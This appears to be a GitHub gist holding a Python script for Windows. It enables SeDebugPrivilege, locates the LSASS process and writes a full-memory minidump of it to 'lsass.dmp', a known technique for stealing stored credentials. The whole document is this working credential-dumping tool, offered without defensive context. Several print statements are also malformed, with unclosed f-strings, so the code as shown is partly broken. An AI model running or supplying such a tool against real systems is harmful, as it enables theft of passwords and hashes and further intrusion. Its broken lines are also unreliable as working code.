@@ -0,0 +1,139 @@
import win32api
import win32con
import win32process
import win32security
import win32file # For CreateFile
import ctypes
from ctypes import wintypes
import os
import psutil
# Constants for MiniDumpWriteDump function
MiniDumpWithFullMemory = 0x00000002
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1F0FFF
dbghelp = ctypes .windll .dbghelp
# MiniDumpWriteDump function argument types
dbghelp .MiniDumpWriteDump .argtypes = [
wintypes .HANDLE , # Process handle
wintypes .DWORD , # Process ID
wintypes .HANDLE , # File handle
wintypes .DWORD , # Dump type
wintypes .LPVOID , # Exception parameter (can be NULL)
wintypes .LPVOID , # User stream parameter (can be NULL)
wintypes .LPVOID # Callback parameter (can be NULL)
]
dbghelp .MiniDumpWriteDump .restype = wintypes .BOOL # Return type is BOOL
# Enable SeDebugPrivilege to access system processes like LSASS
def enable_debug_privilege ():
try :
privilege_name = win32security .LookupPrivilegeValue (None , win32security .SE_DEBUG_NAME )
token = win32security .OpenProcessToken (win32api .GetCurrentProcess (), win32security .TOKEN_ADJUST_PRIVILEGES | win32security .TOKEN_QUERY )
win32security .AdjustTokenPrivileges (token , False , [(privilege_name , win32security .SE_PRIVILEGE_ENABLED )])
print ("SeDebugPrivilege enabled." )
except Exception as e :
print (f"Failed to enable SeDebugPrivilege: { e } )
# Function to find LSASS process
def get_lsass_pid ():
try :
for proc in psutil .process_iter ():
try :
if proc .name ().lower () == "lsass.exe" :
print (f"Found LSASS process: PID = { proc .pid } )
return proc .pid
except (psutil .AccessDenied , psutil .NoSuchProcess ):
pass
except Exception as e :
print (f"Error accessing processes: { e } )
return None
# Function to write a minidump of the LSASS process
def write_lsass_minidump (output_path ):
pid = get_lsass_pid ()
if not pid :
print ("LSASS process not found." )
return False
print (f"Found LSASS process with PID: { pid } )
# Open the LSASS process
h_process = win32api .OpenProcess (PROCESS_ALL_ACCESS , False , pid )
if not h_process :
print (f"Failed to open LSASS process with PID: { pid } )
return False
# Create a file to write the dump using win32file
h_file = win32file .CreateFile (
output_path ,
win32con .GENERIC_WRITE ,
0 ,
None ,
win32con .CREATE_ALWAYS ,
win32con .FILE_ATTRIBUTE_NORMAL ,
None
)
if h_file == win32file .INVALID_HANDLE_VALUE :
print ("Failed to create dump file." )
return False
# Ensure the process and file handles are explicitly cast to ctypes-compatible handles
h_process_ctypes = ctypes .wintypes .HANDLE (int (h_process ))
h_file_ctypes = ctypes .wintypes .HANDLE (int (h_file ))
# Call MiniDumpWriteDump to write the minidump to the file
success = dbghelp .MiniDumpWriteDump (
h_process_ctypes , # Process handle (ctypes HANDLE)
pid , # Process ID (as integer)
h_file_ctypes , # File handle (ctypes HANDLE)
MiniDumpWithFullMemory , # Dump type
None , # Exception parameter (can be NULL)
None , # User stream parameter (can be NULL)
None # Callback parameter (can be NULL)
)
if success :
print (f"Minidump written successfully to { output_path } )
else :
print (f"Failed to write minidump for LSASS. Error: { ctypes .GetLastError ()} )
# Close the file handle
win32file .CloseHandle (h_file )
# Close the process handle
win32api .CloseHandle (h_process )
return success
# Enable SeDebugPrivilege before writing minidump
enable_debug_privilege ()
# Specify the path for the minidump file
dump_file_path = os .path .join (os .getcwd (), "lsass.dmp" )
# Write the minidump
if write_lsass_minidump (dump_file_path ):
print ("Minidump operation completed." )
else :
print ("Minidump operation failed." )
MohitDabas created this gist